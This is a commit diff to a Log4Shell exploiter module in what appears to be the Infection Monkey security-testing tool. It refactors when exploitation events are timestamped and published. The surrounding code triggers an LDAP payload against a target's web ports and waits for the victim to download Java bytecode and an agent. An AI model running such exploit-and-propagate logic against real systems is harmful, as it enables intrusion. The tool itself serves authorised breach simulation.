Agent: Stamp times before the exploit runs

This commit is contained in:
Kekoa Kaaikala 2022-10-05 19:55:56 +00:00 committed by Ilija Lazoroski
parent 48e6e95271
commit 016bf5c795
1 changed files with 21 additions and 33 deletions

View File

@ -1,6 +1,7 @@
import logging import logging
import time import time
from pathlib import PurePath from pathlib import PurePath
from typing import Tuple
from common import OperatingSystem from common import OperatingSystem
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
@ -28,7 +29,6 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter" LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter"
PROPAGATION_TAGS = (LOG4SHELL_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG)
class Log4ShellExploiter(WebRCE): class Log4ShellExploiter(WebRCE):
@ -36,6 +36,12 @@ class Log4ShellExploiter(WebRCE):
SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
def _exploiter_tags(self) -> Tuple[str, ...]:
return (LOG4SHELL_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG)
def _propagation_tags(self) -> Tuple[str, ...]:
return (LOG4SHELL_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG)
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
self._open_ports = [ self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"]) int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
@ -43,10 +49,6 @@ class Log4ShellExploiter(WebRCE):
if not self._open_ports: if not self._open_ports:
logger.info("Could not find any open web ports to exploit") logger.info("Could not find any open web ports to exploit")
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=False,
)
return self.exploit_result return self.exploit_result
self._configure_servers() self._configure_servers()
@ -156,31 +158,34 @@ class Log4ShellExploiter(WebRCE):
f"on port {port}" f"on port {port}"
) )
try: try:
timestamp = time.time()
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port) url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
except Exception as err: except Exception as err:
error_message = "An error occurred while attempting to exploit log4shell on a " error_message = (
"An error occurred while attempting to exploit log4shell on a "
f"potential {exploit.service_name} service: {err}" f"potential {exploit.service_name} service: {err}"
)
logger.warning(error_message) logger.warning(error_message)
self._publish_exploitation_event( self._publish_exploitation_event(timestamp, False, error_message=error_message)
target=self.host.ip_addr,
exploitation_success=False,
error_message=error_message,
tags=(LOG4SHELL_EXPLOITER_TAG,),
)
if self._wait_for_victim(): if self._wait_for_victim(timestamp):
self.exploit_info["vulnerable_service"] = { self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name, "service_name": exploit.service_name,
"port": port, "port": port,
} }
self.exploit_info["vulnerable_urls"].append(url) self.exploit_info["vulnerable_urls"].append(url)
def _wait_for_victim(self) -> bool: def _wait_for_victim(self, timestamp: float) -> bool:
victim_called_back = self._wait_for_victim_to_download_java_bytecode() victim_called_back = self._wait_for_victim_to_download_java_bytecode()
if victim_called_back: if victim_called_back:
self._publish_exploitation_event(timestamp, True)
self._wait_for_victim_to_download_agent() self._wait_for_victim_to_download_agent()
else:
error_message = "Timed out while waiting for victim to download the java bytecode"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return victim_called_back return victim_called_back
@ -190,24 +195,11 @@ class Log4ShellExploiter(WebRCE):
while not timer.is_expired(): while not timer.is_expired():
if self._exploit_class_http_server.exploit_class_downloaded(): if self._exploit_class_http_server.exploit_class_downloaded():
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=True,
tags=(LOG4SHELL_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG),
)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
return True return True
time.sleep(1) time.sleep(1)
error_message = "Timed out while waiting for victim to download the java bytecode"
logger.debug(error_message)
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=False,
error_message=error_message,
tags=(LOG4SHELL_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG),
)
return False return False
def _wait_for_victim_to_download_agent(self): def _wait_for_victim_to_download_agent(self):
@ -216,11 +208,7 @@ class Log4ShellExploiter(WebRCE):
while not timer.is_expired(): while not timer.is_expired():
if self._agent_http_server_thread.downloads > 0: if self._agent_http_server_thread.downloads > 0:
self._publish_propagation_event( self._publish_propagation_event(success=True)
target=self.host.ip_addr,
propagation_success=True,
tags=PROPAGATION_TAGS,
)
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
break break